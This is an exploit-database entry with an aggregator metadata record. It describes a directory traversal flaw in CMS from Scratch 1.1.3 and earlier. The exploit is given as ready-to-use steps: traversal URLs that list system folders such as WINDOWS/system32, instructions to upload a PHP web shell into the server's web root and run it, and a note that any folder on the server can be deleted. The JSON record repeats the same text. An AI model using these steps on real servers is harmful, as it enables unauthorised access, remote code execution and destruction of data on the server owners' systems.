CMS from Scratch <= 1.1.3 image.php Directory Traversal Vulnerability
2008-05-29T00:00:00
ID EDB-ID:5693 Type exploitdb Reporter Stack Modified 2008-05-29T00:00:00
Description
CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability. Webapps exploit for php platform
------------------------------------------------------------------------
CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability
------------------------------------------------------------------------
author...: Stack
mail.....: Wanted
wanted by Egix
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)
Exploit :
# http://localhost/path/cms/images.php?dir=c:
Example :
# http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/
Exploit 2 :
and you can upload php file ==> php shell
for example upload the php shell in my localhost
c:AppServ/www/
you go to link
# http://localhost/path/cms/images.php?dir=c:AppServ/www/
after click to colon [parcourir] after select your shell and click upload
and go to link
# http://localhost/shell.php
desc :you can delete all folder of server
just clike to mark delete in folder selected to delete
thx : allah
# milw0rm.com [2008-05-29]
{"id": "EDB-ID:5693", "hash": "302efd7503ed2d3d37c9b45e788b4eb8", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CMS from Scratch <= 1.1.3 image.php Directory Traversal Vulnerability", "description": "CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability. Webapps exploit for php platform", "published": "2008-05-29T00:00:00", "modified": "2008-05-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/5693/", "reporter": "Stack", "references": [], "cvelist": [], "lastseen": "2016-01-31T23:27:01", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-01-31T23:27:01"}, "dependencies": {"references": [], "modified": "2016-01-31T23:27:01"}, "vulnersScore": 0.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5693/", "sourceData": "------------------------------------------------------------------------\n CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability\n------------------------------------------------------------------------\n \n author...: Stack\n mail.....: Wanted\n wanted by Egix\nGr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)\n\nExploit :\n # http://localhost/path/cms/images.php?dir=c:\n Example :\n # http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/\n \nExploit 2 :\n\n and you can upload php file ==> php shell\n for example upload the php shell in my localhost\n c:AppServ/www/\n you go to link\n # http://localhost/path/cms/images.php?dir=c:AppServ/www/\n after click to colon [parcourir] after select your shell and click upload\n and go to link\n # http://localhost/shell.php\n desc :you can delete all folder of server\n just clike to mark delete in folder selected to delete\n\n thx : allah \n\n# milw0rm.com [2008-05-29]\n", "osvdbidlist": ["45753", "45751", "45750", "45752"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}